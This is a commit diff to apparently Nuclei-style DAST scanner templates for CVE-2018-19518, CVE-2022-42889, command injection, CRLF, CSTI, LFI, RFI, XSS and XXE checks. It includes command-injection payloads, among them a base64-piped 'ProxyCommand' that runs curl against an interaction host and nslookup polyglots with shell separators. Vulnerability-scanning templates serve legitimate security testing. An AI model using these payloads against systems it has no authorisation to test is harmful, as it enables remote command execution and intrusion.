few misc updates

2024-04-08 12:15:08 +05:30 · 2024-04-08 12:15:08 +05:30 · beff2af7c1
parent 421f9dfd9f
commit beff2af7c1
9 changed files with 35 additions and 20 deletions
--- a/dast/cves/2018/CVE-2018-19518.yaml
+++ b/dast/cves/2018/CVE-2018-19518.yaml
@ -28,15 +28,21 @@ http:

    payloads:
      php-imap:
-        - "x -oProxyCommand=echo {{base64(url_encode('nslookup {{interactsh-url}}'))}}|base64 -d|sh}"
+        - "x -oProxyCommand=echo {{base64(url_encode('curl {{interactsh-url}}'))}}|base64 -d|sh}"

    fuzzing:
      - part: query
        fuzz:
          - "{{php-imap}}"

+    matchers-condition: and
    matchers:
      - type: word
-        part: interactsh_protocol  # Confirms the DNS Interaction
+        part: interactsh_protocol
        words:
-          - "dns"
+          - http
+
+      - type: word
+        part: interactsh_request
+        words:
+          - "User-Agent: curl"
--- a/dast/cves/2022/CVE-2022-42889.yaml
+++ b/dast/cves/2022/CVE-2022-42889.yaml
@ -64,3 +64,4 @@ http:
        part: interactsh_request
        group: 1
        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
--- a/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml
+++ b/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml
@ -22,7 +22,7 @@ http:
          - 'method == "GET"'

    payloads:
-      interaction:
+      payload:
        - "&nslookup {{marker}}&'\\\"`0&nslookup {{marker}}&`'"
        - "1;nslookup${IFS}{{marker}};#${IFS}';nslookup${IFS}{{marker}};#${IFS}\";nslookup${IFS}{{marker}};#${IFS}"
        - "/*$(nslookup {{marker}})`nslookup {{marker}}``*/-nslookup({{marker}})-'/*$(nslookup {{marker}})`nslookup {{marker}}` #*/-nslookup({{marker}})||'\"||nslookup({{marker}})||\"/*`*/"
@ -32,7 +32,7 @@ http:
      - part: query
        type: postfix
        fuzz:
-          - "{{interaction}}"
+          - "{{payload}}"

    stop-at-first-match: true
    matchers:
--- a/dast/vulnerabilities/crlf/crlf-injection.yaml
+++ b/dast/vulnerabilities/crlf/crlf-injection.yaml
@ -11,6 +11,7 @@ http:
      - type: dsl
        dsl:
          - 'method == "GET"'
+
    payloads:
      escape:
        - "%00"
--- a/dast/vulnerabilities/csti/angular-client-side-template-injection.yaml
+++ b/dast/vulnerabilities/csti/angular-client-side-template-injection.yaml
@ -4,10 +4,16 @@ info:
  name: Angular Client-side-template-injection
  author: theamanrawat
  severity: high
+  description: |
+    Detects Angular client-side template injection vulnerability.
+  impact: |
+    May lead to remote code execution or sensitive data exposure.
+  remediation: |
+    Sanitize user inputs and avoid using user-controlled data in template rendering.
  reference:
    - https://www.acunetix.com/vulnerabilities/web/angularjs-client-side-template-injection/
    - https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs
-  tags: angular,csti,dast
+  tags: angular,csti,dast,headless,xss

 variables:
  first: "{{rand_int(1000, 9999)}}"
@ -19,6 +25,7 @@ headless:
      - action: navigate
        args:
          url: "{{BaseURL}}"
+
      - action: waitload

    payloads:
--- a/dast/vulnerabilities/lfi/lfi-keyed.yaml
+++ b/dast/vulnerabilities/lfi/lfi-keyed.yaml
@ -1,7 +1,7 @@
 id: lfi-keyed

 info:
-  name: Key LFI Detection
+  name: LFI Detection - Keyed
  author: pwnhxl
  severity: unknown
  reference:
--- a/dast/vulnerabilities/rfi/generic-rfi.yaml
+++ b/dast/vulnerabilities/rfi/generic-rfi.yaml
@ -1,7 +1,7 @@
-id: rfi
+id: generic-rfi

 info:
-  name: Remote File Inclusion
+  name: Generic Remote File Inclusion
  author: m4lwhere
  severity: high
  reference:
--- a/dast/vulnerabilities/xss/dom-xss.yaml
+++ b/dast/vulnerabilities/xss/dom-xss.yaml
@ -4,18 +4,22 @@ info:
  name: DOM Cross Site Scripting
  author: theamanrawat
  severity: medium
-  tags: xss,dom,dast
-
+  description: |
+    Detects DOM-based Cross Site Scripting (XSS) vulnerabilities.
+  impact: |
+    Allows attackers to execute malicious scripts in the victim's browser.
+  remediation: |
+    Sanitize and validate user input to prevent script injection.
+  tags: xss,dom,dast,headless
 variables:
  num: "{{rand_int(10000, 99999)}}"
-
 headless:
  - steps:
      - action: navigate
        args:
          url: "{{BaseURL}}"
-      - action: waitload

+      - action: waitload
    payloads:
      reflection:
        - "'\"><h1>{{num}}</h1>"
@ -38,8 +42,4 @@ headless:
      - type: word
        part: header
        words:
-          - "text/html"
-
-      - type: status
-        status:
-          - 200
+          - "text/html"
--- a/dast/vulnerabilities/xxe/generic-xxe.yaml
+++ b/dast/vulnerabilities/xxe/generic-xxe.yaml
@ -1,7 +1,7 @@
-id: fuzz-xxe
+id: generic-xxe

 info:
-  name: XXE Fuzzing
+  name: Generic XML external entity (XXE)
  author: pwnhxl
  severity: medium
  reference: